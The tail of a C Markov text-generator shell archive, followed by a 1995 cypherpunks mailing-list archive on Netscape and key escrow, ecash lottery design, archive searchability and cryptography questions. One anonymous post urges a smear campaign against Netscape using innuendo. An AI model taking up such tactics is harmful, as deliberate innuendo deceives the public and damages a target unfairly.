X        if (verbose && n_pairs % 1000 == 0)
X            Fprintf (stderr, "%d pairs\n", n_pairs);
X        return p;
X    }
X    cmp = my_strcmp (p->text, txt);
X    if (cmp == 0) cmp = my_strcmp (p->text2, txt2);
X    if (cmp == 0) {
X/* It's a match. Increment the count. */
X        tknptr = p;
X        p->ocount += 1;
X    }
X/* Look in the subtrees.
*/
X    else if (cmp < 0) p->lc = insert_in_tree (p->lc, txt, txt2);
X    else p->rc = insert_in_tree (p->rc, txt, txt2);
X    return p;
X}
X
X/*
X * This just calls insert_in_tree starting at the root
X */
Xstruct node *
Xinsert_token (txt, txt2)
Xchar *txt,*txt2;
X{
X    root = insert_in_tree (root, txt, txt2);
X    return tknptr;
X}
X
X/*
X * This function adds a successor.
X */
Xstruct succnode *
Xinsert_in_succ_chain (sp, np)
Xstruct succnode *sp;
Xstruct node *np;
X{
X    if (sp == NULL) {
X        sp = (struct succnode *) malloc (sizeof *sp);
X        sp->scnod = np;
X        sp->count = 1;
X        sp->link = NULL;
X    }
X    else if (sp->scnod == np)
X        sp->count += 1;
X    else sp->link = insert_in_succ_chain (sp->link, np);
X    return sp;
X}
X
X/*
X * This calls insert_in_succ_chain starting at the right place.
X */
Xinsert_pair (p1, p2)
Xstruct node *p1, *p2;
X{
X    if (p1) p1->succ = insert_in_succ_chain (p1->succ, p2);
X    else start = insert_in_succ_chain (start, p2);
X}
X
X/*
X * This function dumps the stored data structure onto a file.
X * Now if only I had a function to read it back in.
X */
Xchar *
Xpr_token (txt)
Xchar *txt;
X{
X    if (txt[0] != '\n')
X        return txt;
X    return txt[1] ? "" : "";
X}
X
Xtreedump (tree, fp)
Xstruct node *tree;
XFILE *fp;
X{
X    if (tree) {
X        treedump (tree->rc, fp);
X        Fprintf (fp, "( %s %s ) %d", pr_token (tree->text),
X            pr_token (tree->text2), tree->ocount);
X        chaindump (tree->succ, fp);
X        treedump (tree->lc, fp);
X    }
X}
X
X/*
X * Subroutine of treedump; it does one row.
X */
Xchaindump (p, fp)
Xstruct succnode *p;
XFILE *fp;
X{
X    char *text;
X    while (p) {
X        if (p->scnod == NULL)
X            text = "";
X        else text = pr_token (p->scnod->text2);
X        Fprintf (fp, " %s %d", text, p->count);
X        p = p->link;
X    }
X    putc ('\n', fp);
X}
X
X/*
X * This routine generates the dump file (-d option)
X */
Xdump_database (file)
Xchar *file;
X{
X    FILE *fp = fopen (file, "w");
X    if (fp == NULL) {
X        Fprintf (stderr, "markov: can't open ");
X        perror (file);
X        exit (1);
X    }
X    Fprintf (fp, "START:");
X    chaindump (start, fp);
X    treedump (root, fp);
X}
X
X/* roll (n) generates a uniformly distributed rv between 0 and n-1.
X * This code is stolen from "hack" and should be portable. If you
X * change this, remember that different systems have rand functions
X * with different ranges, and the bottom bits are often no good.
X */
X#define roll(n) ((rand() >> 3) % n)
X
X/*
X * This function generates an article by traversing the
X * structure we've built.
X */
Xgenerate_article () {
X    struct succnode *p = start;
X    int ncounts = n_files;
X    int n, accum;
X    char *tp;
X
X    while (1) {
X/* Roll the dice to find out the next token. The code below selects the
X * next token, and the new state, with a probability corresponding to the
X * frequency in the input.
X */
X        n = roll (ncounts);
X        accum = p->count;
X        while (accum <= n && p->link) {
X            p = p->link;
X            accum += p->count;
X        }
X        if (p->scnod == NULL)
X            break;
X        tp = p->scnod->text2;
X/* Check for "end of story" */
X        if (tp == NULL)
X            break;
X        output_word (tp);
X        ncounts = p->scnod->ocount;
X        p = p->scnod->succ;
X    }
X    output_word ("\n"); /* This will flush the buffer as well. */
X    return;
X}
X
X/*
X * This version handles null strings *
X */
Xmy_strcmp (a, b)
Xregister char *a, *b;
X{
X    if (a == NULL) return b ?
-1 : 0;
X    if (b == NULL) return 1;
X    return strcmp (a, b);
X}
X
X#define LEN 75
Xoutput_word (word)
Xchar *word;
X{
X    static char line[LEN+1];
X    static int room = LEN;
X    int l;
X
X    if (word == NULL) return;
X    l = strlen (word);
X/* If word won't fit, or starts with \n, dump the current line */
X    if ((l >= room || word[0] == '\n') && line[0]) {
X        Printf ("%s\n", line);
X        line[0] = 0;
X        room = LEN;
X    }
X/* If word won't fit in the buffer or starts with \n, print it now */
X    if (l >= LEN)
X        Printf ("%s\n", word);
X    else if (word[0] == '\n')
X        Printf ("%s", word);
X/* Otherwise fill it in */
X    else {
X        (void)strcat (line, word);
X        (void)strcat (line, " ");
X        room -= (l + 1);
X    }
X    return;
X}
END_OF_FILE
if test 11822 -ne `wc -c <'markov3.l'`; then
    echo shar: \"'markov3.l'\" unpacked with wrong size!
fi
# end of 'markov3.l'
fi
echo shar: End of archive.
exit 0

From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 21:43:08 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 13:43:08 +0800
Subject: The future will be easy to use
Message-ID: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>

From: IN%"jlasser at rwd.goucher.edu" "Jon Lasser" 29-NOV-1995 16:23:00.41

Not if you're encrypting a Credit Card transaction to ship physical goods. In that case, I'm going to certainly want to link a key ID to a physical body (or at least address) if I'm the seller, so as to limit liability as best I can. While this might not ultimately be important, early adopters of crypto on the net seem in general to be financially interested with an eye to limiting liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not linking name -> key id fail. This is the step necessary to get it out the door. Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only ship to keys with such attributes.
Because just ID and address, it could be a "hit and run" type attack shipped to a safe maildrop.
---------------------------------
If the transaction is via a Credit Card, it's the card issuer's liability (and responsibility to determine creditworthiness), unless I'm badly mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge physical dollars when ecash is presented to them. What's the risk in either case?
-Allen

From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 21:44:58 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 13:44:58 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <01HY8GTQ0EGY8WYXCN@mbcl.rutgers.edu>

From: IN%"tcmay at got.net" 29-NOV-1995 23:16:11.12

Personally, I have long had great _hopes_ for using crypto for non-sanctioned gambling, but I'm pretty skeptical that many people will do it. For one thing, anyone knowledgeable enough to be comfortable with the cryptography knows that gambling when a house cut exists is a lose. (And gambling with no house cut is, at best, a wash.)
-----------------------
How about gambling on something other than random numbers? Idea Futures are one instance, as is sports gambling for those interested in that sort of thing.
-Allen

From s1113645 at tesla.cc.uottawa.ca Wed Nov 29 22:01:04 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 14:01:04 +0800
Subject: Esoteric Lotteries Re: Quit it!
In-Reply-To: <199511300520.GAA07040@utopia.hacktic.nl>
Message-ID:

One might be tempted to use the number of posts claiming to be from Alice d'Anonymous on any particular day as a fair random number basis for some gambling scheme.

Good going Alices

Not another one of those...

From anonymous-remailer at shell.portal.com Wed Nov 29 22:13:21 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 30 Nov 1995 14:13:21 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511300602.WAA13054@jobe.shell.portal.com>

Alice here ...

Sorry to follow up on my own post, but I made a boo boo. A real, big boo boo.

On Wed, 29 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> On Wed, 29 Nov 1995, Adam Shostack wrote:
> >
> > I don't follow. You're claiming that PGP is good enough to
> > transfer OTPads, but not good enough to sign pseudonymous messages?
>
> Sure. Two different situations.
>
> If I take a message or a data tape and encrypt it with a one time pad.
>
> And then I send the message out to someone via Greyhound or DHL.
>
> And once they've confirmed that they have the encrypted message safely in
> hand, then I'll call them and ask them to call me with their public key
> delivered by voice via telephone.

Actually, I made a big mistake here. It's not good enough for me to call them. Usually I have them first call me, and then I call them back.

I learned to do this in real-estate when I had my property management company. Very often, someone would call the office, and say something along the lines of "This is Constable Acheson, from the Calgary City Police. Could you please tell me the forwarding address of your former tenant, Alice" (or Bob, or whatever).

My standard response always was to ask for whoever identified himself as "Constable Acheson" to provide his division. Then I'd hang up, check the number for the main switchboard in the phone book and then call him. This way, I'd be sure it was actually him, and that he was calling from where he claimed.

You'd probably be surprised (or maybe not) how many times, there was no such Constable. Luckily, I just didn't give out my information to just *anyone*.

And the same stuff applies here ...
with reading and verifying the key over the telephone. With the phone call there should be a hangup and then some third-party authority to confirm that the channel of communication is *really* a valid channel.

Sorry, about leaving that part out. It was a boo boo, eh? But it's important, RL stuff.

> Which I then use to encrypt the one-time-pad, using the PGP key only once.
>
> Then, I'm comfortable sending it (not the message, but the pad) over the
> Internet encrypted with PGP. And I think at that point, I have Pretty
> Good Privacy.
>
> > Adam
> >
> > --
> > "It is seldom that liberty of any kind is lost all at once."
> >
>
> Alice de 'nonymous ...
>
> ...just another one of those...
>
>
> P.S. This post is in the public domain.
> C. S. U. M. O. C. L. U. N. E.
>

Yep, it was the real me this time ... and no, I didn't add another "signature" encrypted or not encrypted to the bottom of this post.

Let me ask this though?? Would the "quality" of my post have changed one way or another, if this was signed, or not?? IMHO, the message should make sense (or not) either way.

... Alice ...

From nobody at REPLAY.COM Wed Nov 29 22:32:34 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 14:32:34 +0800
Subject: Applied Cryptography Questions
Message-ID: <199511300614.HAA08769@utopia.hacktic.nl>

A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

ADVANTAGES
Distributed computing, no easy bombing target.

DISADVANTAGES
39% inefficient
Need specialized hardware [for speed] or transmission of algorithms for any specific algorithm
Not on all the time

If value(crack) * cracks/chip > cost of chip, then why not have the gov buy the chips? It's probably cheaper that way.

3. How does one cryptanalyze a Feistel Network?
I've read a bit on this and it doesn't seem that the papers are consistent, for example, one claims that 2^32 chosen plaintext is unreasonable for a 64-bit block cipher whereas DES's cryptanalysis requires something like 2^42.

4. Does there exist an n such that a keyspace of 2^n is trivial to crack [ie a matter of minutes] on a PC but is difficult to crack for a big commercial company or even a major government? [this question relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?

From frantz at netcom.com Wed Nov 29 22:39:26 1995
From: frantz at netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 14:39:26 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <199511300621.WAA26406@netcom14.netcom.com>

At 20:38 11/29/95 -0800, Timothy C. May wrote:
>Have to be _very_ careful here. A variety of scams can be developed which
>show lots of "small" winners, but which fail to show any large winners. The
>lottery operators can make a lot of extra bucks by simply not paying off
>the large winnings, in various ways.

With complete anonymity, the scam I would think of first is giving other nyms of myself all the big payoffs.

Bill

From sameer at c2.org Wed Nov 29 22:59:05 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 1995 14:59:05 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511300644.WAA02011@infinity.c2.org>

http://www.cnet.com/Central/News/govt.html

Bad. Very Bad. And I was almost starting to like Netscape.

--
sameer                                      Voice: 510-601-9777
Community ConneXion                         FAX: 510-601-9734
The Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")    sameer at c2.org

From loki at obscura.com Wed Nov 29 23:05:13 1995
From: loki at obscura.com (Lance Cottrell)
Date: Thu, 30 Nov 1995 15:05:13 +0800
Subject: META: Lycos & Searchable archives
Message-ID:

If you mail to an open list or post to news you are shouting through a megaphone on a street corner.
If you don't want everyone to know what you said, use a remailer (this group above all others should do that).

-Lance

At 9:56 PM 11/29/95, Leslie Todd Masco wrote:
>
>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos. Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the web-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this? My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.
>- --
>Todd Masco | "life without caution/ the only worth living / love for a man/

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From hallam at w3.org Thu Nov 30 00:03:36 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 30 Nov 1995 16:03:36 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
In-Reply-To: <01BABE83.A3A80240@ploshin.tiac.net>
Message-ID: <9511300318.AA02710@zorch.w3.org>

Both Netscape and Sun had a product that had a large number of seats. From what I have seen the POTP have diddly squat in the way of seats.

Looking at the market today it is clear that there are fewer opportunities to do that type of roll out. Netscape and Sun were running just ahead of a market.
Today I don't see how many people will want to abandon PGP for a product that is indistinguishable from smoke 'n mirrors.

Phill

From scs at lokkur.dexter.mi.us Thu Nov 30 00:03:52 1995
From: scs at lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 30 Nov 1995 16:03:52 +0800
Subject: key for Alice as promised (not)
In-Reply-To: <199511290507.VAA10591@jobe.shell.portal.com>
Message-ID: <49j6ot$5t1@lokkur.dexter.mi.us>

anonymous-remailer at shell.portal.com writes:

>PGP is really not the issue. The issue is more my security and the
>environment that I use PGP in. I don't have a trusted machine to run PGP
>on. Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in.

Oh, puh-lease. Do you often send anonymous mail to cypherpunks with your co-workers and friends looking over your shoulder? So much for your anonymity and security.

I dunno about this theory of reputation stuff, but you've sure developed one.
--
Yea, the heavens shall open and the NP-complete solution given forth. ATT executives shall give birth to two-headed operating systems, and copyrights shall be expunged. The voice of the GNU shall be heard, but the faithless will be without transceivers.

From futplex at pseudonym.com Thu Nov 30 00:20:41 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 16:20:41 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <199511300807.DAA12251@opine.cs.umass.edu>

sameer writes:
> http://www.cnet.com/Central/News/govt.html

I think this is sufficiently important for a partial quotation:

---------------------------------------------
By Anne Knowles
November 29, 1995, 12 p.m. PT

BOSTON--Getting the government involved in maintaining Internet data privacy may not be popular, but it's going to be necessary.
That's the message Netscape Communications chair Jim Clark delivered this morning in his keynote address to an audience here at Email World and Internet Expo.

To secure Net communications, the government will need to have access to private data exchanges using what is known as a key escrow security system, said Clark. He added that an invincible security system for the Net is possible, but such a system won't be built unless the government has a stake in it. "That's where key escrow comes in," said Clark.
---------------------------------------------

> Bad. Very Bad.

Agreed. As of a moment ago I could find absolutely no mention of this on Netscape's web pages. I hope they will at least have the courage to put out a "We Support Clipper II" press release. Now the question is, how much of a role does Netscape Communications intend to play in implementing GAK, and what can we do to counter it ?

-Futplex

From sameer at c2.org Thu Nov 30 00:44:29 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 1995 16:44:29 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To:
Message-ID: <199511300324.TAA11412@infinity.c2.org>

> Personally, I have long had great _hopes_ for using crypto for
> non-sanctioned gambling, but I'm pretty skeptical that many people will do
> it. For one thing, anyone knowledgeable enough to be comfortable with the
> cryptography knows that gambling when a house cut exists is a lose. (And
> gambling with no house cut is, at best, a wash.)
>

"anyone knowledgeable enough to be comfortable with the cryptography knows that gambling when a house cut exists is a lose."

These people would not be the target market. My figuring is that the target market for lotteries would be your average joe home web browser, and your gambling addicts, of course. These people would not be comfortable with encrypted open books, but I don't think that encrypted open books is really necessary to run a lottery which provably doesn't cheat.
(Perhaps not *provably*, but reliably enough that people will play... )

High stakes lotteries may not be suitable but a slot-machine low-stakes system with perhaps a $1/play and a 40% chance of winning *something* (maybe not the full $1.00) could satisfy people enough that they will keep playing, and tell their friends about it.

The target market here is by no means people who understand that house cut gambling is a lose.

The reason to have an ecash casino/lottery is two-fold:
A) Make ecash take off.
B) Make lots of money.

--
sameer                                      Voice: 510-601-9777
Community ConneXion                         FAX: 510-601-9734
The Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")    sameer at c2.org

From tcmay at got.net Thu Nov 30 00:47:58 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 16:47:58 +0800
Subject: META: Lycos & Searchable archives
Message-ID:

At 5:56 AM 11/30/95, Leslie Todd Masco wrote:
>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos. Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the web-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this? My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.

I'm not sure how we'll find a consensus, and I don't relish the thought of seeing hundreds of responses to your point, but....here's my vote.

I say any self-respecting Cypherpunk should realize immediately that _every_ word one has ever posted to Usenet, mailing lists, and other public or semi-public fora will soon be instantly retrievable.
(The rates of growth of the Net and of storage densities make it clear that archiving _all_ past public messages is not much harder than archiving only the most recent ones...thus, I predict, in 2005 one will be able to buy a disk or disks of _all_ Usenet traffic prior to, say, 2003.)

More immediately, the person or persons who object to Lycos/Deja News/Excite searches of their words face an uphill battle. Satisfying them would mean making the various archive sites (currently only yours, Todd, but other sites also store the traffic) unavailable.

So, I say: "Get with the program." Don't say anything under your True Name that you don't want job interviewers to pull up in their pro forma searches of your Usenet involvement.

(Thank God the U.S. has none of those damned "data privacy laws" which might interfere with how people access the Net.)

--Tim May, who has said many, many controversial or even embarrassing things over the years, but who thinks anyone offended by his comments is not someone he would want to deal with anyway.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Thu Nov 30 01:03:02 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:03:02 +0800
Subject: Netscape gives in to key escrow
Message-ID:

At 6:44 AM 11/30/95, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
> Bad. Very Bad. And I was almost starting to like Netscape.

Thank you Sameer for pointing this out. Jim Clark is actively working for the enemies of liberty and freedom.
Consider this quote:

"To secure Net communications, the government will need to have access to private data exchanges using what is known as a key escrow security system, said Clark. He added that an invincible security system for the Net is possible, but such a system won't be built unless the government has a stake in it. "That's where key escrow comes in," said Clark."

Note that this is beyond the "watered down" forms of "commercial key escrow" that many advocates of forms of key escrow often like to talk about (such as the nominally voluntary schemes espoused by TIS). This speech by Clark is actually closer to the real truth of key escrow that we normally hear from public speakers: the government will need to have access, therefore the key escrow will be mandatory, not voluntary.

Can Netscape continue to prosper? This latest issue won't kill it, naturally, but I doubt a $5 billion market capitalization can persist when a company has no technology that cannot be duplicated or bettered by others.

As an example, I use Netscape to do certain things, Eudora to do other things, and Newswatcher to do still other things...I will switch to an improved Web browser _much_ faster than I will switch to a new word processor. I don't see much "staying power" inherent in Netscape's browser, so I can't see how the company can maintain a market capitalization greater than that of General Dynamics, CBS, and Apple.

I wonder what discussions Jim Clark has been having with the Feds?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From nobody at REPLAY.COM Thu Nov 30 01:11:04 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:11:04 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511300849.JAA13845@utopia.hacktic.nl>

-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
...
>---------------------------------------------
...
> said Clark. He added that an invincible security system for the Net is
> possible, but such a system won't be built unless the government has a stake
> in it. "That's where key escrow comes in," said Clark.
>---------------------------------------------

"A stake in its heart," more like.

Futplex then wrote:

...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

Well, spamming the sign won't do. Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any sense: if Perry or someone would vet a hacked copy, I'd use it in a second. But hacking it would involve a violation of the license, so hacked versions couldn't be offered in any above-ground way: there'd be no way to certify a hacked copy with a trusted nym's key.

Netscape is between a rock and a hard place: I think it's safe to say that, were all things equal, NS would support strong crypto. The fact that NS has decided otherwise suggests that some pressure was applied: Clark says as much. This leads me to believe that one possibly effective (and possibly dangerous) tactic might lie in a seriously sustained attack on NS's reputation -- keeping up a meme-drumbeat of "you can't trust Netscape, that's all, you'll get ripped off." I think we should try it -- TODAY, now, persistently and loudly, until NS comes around. I'm not saying that this'll be enough, but it's a start. TODAY.
And I really don't care what it takes: calling cronies in the press, spreading innuendo, redoing NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the N... I've seen some nice "NO Netscape" tags on GNU-related pages.

Let's do it.

Hieronymous

FB DD B5 C8 FB F4 52 41 F0 0F A0 6E 99 43 75 06

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----

From tcmay at got.net Thu Nov 30 01:23:49 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:23:49 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID:

At 6:22 AM 11/30/95, Bill Frantz wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonymity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.

Yes, this is a good example of one of the scams. If the lottery can't/won't reveal True Names of winners--a basic design criterion--then clearly people may have doubts.

The whole thing can be cast as follows; "Send us money and we'll put your name in a hat. We'll let you know if you win, but we won't tell the public who won."
(This problem is quite similar to voting protocols, so we might look to "fair voting" protocols for ideas.)

My intuition (hand-waving) is that an anonymous lottery is possible, but I haven't looked at the details. Certainly multiple trusted holders of keys (escrow agents) would help make the lottery fair. Maybe bit commitment would help (each player buys the right to play, then "commits" his number. A public reading of the winning number occurs, and the winner can reveal his winning number (anonymously if he wishes, providing he had registered his hash....).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rjc at clark.net Thu Nov 30 01:29:36 1995
From: rjc at clark.net (Ray Cromwell)
Date: Thu, 30 Nov 1995 17:29:36 +0800
Subject: Netscape gives in to key escrow
In-Reply-To:
Message-ID: <199511300918.EAA13821@clark.net>

What's the point? Surely Clark must realize that even if Netscape adds key escrow to SSL/Secure Courier, it is still possible to tunnel real encryption through that link thus thwarting the escrow system.

In fact, this is the perfect job for Java:

1) Client connects to server thru insecure key-escrow channel and downloads Java applet
2) Java applet opens new connection to server using "invincible" security as Clark puts it, and performs add transactions on this channel.

In fact, in the future, a large number of "forms" will be Java applets which submit information back to the server themselves.

And what about IPSEC ESP? Even if the application layer is weak, the link layer can more than make up for it.
Now, Netscape has momentum, and if they set a key-escrow standard, there is a chance of it being adopted widely. However, Java applets and IPSEC can still make transactions through an insecure netscape payment/encryption channel. The genie is out of the bottle.

-Ray

From nobody at REPLAY.COM Thu Nov 30 02:17:39 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 18:17:39 +0800
Subject: Applied Cryptography Questions
Message-ID: <199511301008.LAA15993@utopia.hacktic.nl>

A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

ADVANTAGES
Distributed computing, no easy bombing target.

DISADVANTAGES
39% inefficient
Need specialized hardware [for speed] or transmission of algorithms for any specific algorithm
Not on all the time

If value(crack) * cracks/chip > cost of chip, then why not have the gov buy the chips? It's probably cheaper that way.

3. How does one cryptanalyze a Feistel Network? Is there a general method?

4. Does there exist an n such that a keyspace of 2^n is trivial to crack [ie a matter of minutes] on a PC but is difficult to crack for a big commercial company or even a major government? [this question relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?

From s1113645 at tesla.cc.uottawa.ca Thu Nov 30 03:31:21 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 19:31:21 +0800
Subject: META: Lycos & Searchable archives
In-Reply-To: <199511300556.AAA15009@bb.hks.net>
Message-ID:

On Thu, 30 Nov 1995, Leslie Todd Masco wrote:

> Someone has expressed concern to me that the cypherpunks archives are
> searchable via Lycos. Said person doesn't mind having the archives
> searchable to the smaller audience of people who go to the web-site,
> but is unhappy about net-wide searches turning up cypherpunks articles.
Lycos only has a database of abstracts of the archive (which is still commendable) and the other databases have smallish local archives of the list. There's no way to do a compleat search at present (other than manual labor and writing 'bots). A true search engine at the site would be a godsend.

I presume that people who post want their posts read.

From jirib at sweeney.cs.monash.edu.au Thu Nov 30 03:37:34 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 30 Nov 1995 19:37:34 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To:
Message-ID: <199511301122.WAA23954@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com and tcmay at got.net (Timothy C. May)

tcmay wrote:
> At 6:22 AM 11/30/95, Bill Frantz wrote:
> >At 20:38 11/29/95 -0800, Timothy C. May wrote:
> >>Have to be _very_ careful here. A variety of scams can be developed which
> >>show lots of "small" winners, but which fail to show any large winners. The
...
> My intuition (hand-waving) is that an anonymous lottery is possible, but I
> haven't looked at the details. Certainly multiple trusted holders of keys
...

I've read somewhere that it's possible to play poker over the telephone; see comp.risks 17.19 and 17.21 (particularly the latter, though I haven't followed the references so I can't speak of them).

...
> (escrow agents) would help make the lottery fair. Maybe bit commitment
> would help (each player buys the right to play, then "commits" his number.
...

How about every person commits a random number, then all reveal. The winner is determined deterministically from all the numbers.

Does this make sense or is there some basic hole in it?

(
I have a tendency to be too brief to be comprehensible, so let me rephrase it somewhat longer:
1. game is announced, players registered and numbered [1]..[n]
2. each player [i] chooses a random number [a_i] (secretly)
3. each player [i] publicly commits to [a_i]
4. wait for all players to commit
5.
each player [i] publishes [a_i]
6. the winner is player [f(a_1,a_2,...,a_n)]

The function f doesn't need to be one way, but the output must depend on all the inputs. (Sum modulo n sounds OK but I haven't thought it out.)
)

The fun bit in this game would be picking your number - of course that reduces security, but I suspect that many people would prefer to type in their lucky numbers themselves than having a computer pick it for them... Or you could get the entropy from the mouse: "it's all in the wrist". You could probably almost code that in a shell script...

Obvious weakness is that the last player to do step 5 above knows who the winner is before anyone else, and could presumably disappear. The way to avoid this is a rule that when a player disappears the money goes to charity. (A malicious last player could still prevent you from winning, but at least without payoff. You could give it negative payoff if you wanted.)

If you wish to discuss this point, Cc me at jiri at c031.aone.net.au - that's where my spreadsheet is.

Have I just made a complete fool of myself?

Jiri
- --
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2T0yxV6mvvBgf5AQEtGQP/VKUGrArDxG98iIiAtQ0zuErSjCsMJN+P
HJ8MROmbgPa5kstzLMRk6wjPSkxSuUtiLLVbTTV6Aghfi2Kh7mRa6D38j43hyImU
Z0V6V7gtCis/QzZ7KSTt5KKkDev672bbL17XYVWhMfvLABUG7L7kCbbKDGjUgUrL
yl4H+8Pxt1c=
=2nuk
-----END PGP SIGNATURE-----

From frissell at panix.com Thu Nov 30 03:53:07 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 30 Nov 1995 19:53:07 +0800
Subject: Netscape gives in to key escrow
Message-ID: <2.2b8.32.19951130114416.00950858@panix.com>

At 10:44 PM 11/29/95 -0800, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
> Bad. Very Bad. And I was almost starting to like Netscape.
>

But I did like the story's description of Damien Doligez as a "group of French scientists."

DCF

"Who used to have a personal life but who now does nothing but download Beta upgrades from the Net."

From a.brown at nexor.co.uk Thu Nov 30 03:55:02 1995
From: a.brown at nexor.co.uk (Andy Brown)
Date: Thu, 30 Nov 1995 19:55:02 +0800
Subject: Microsoft weak encryption
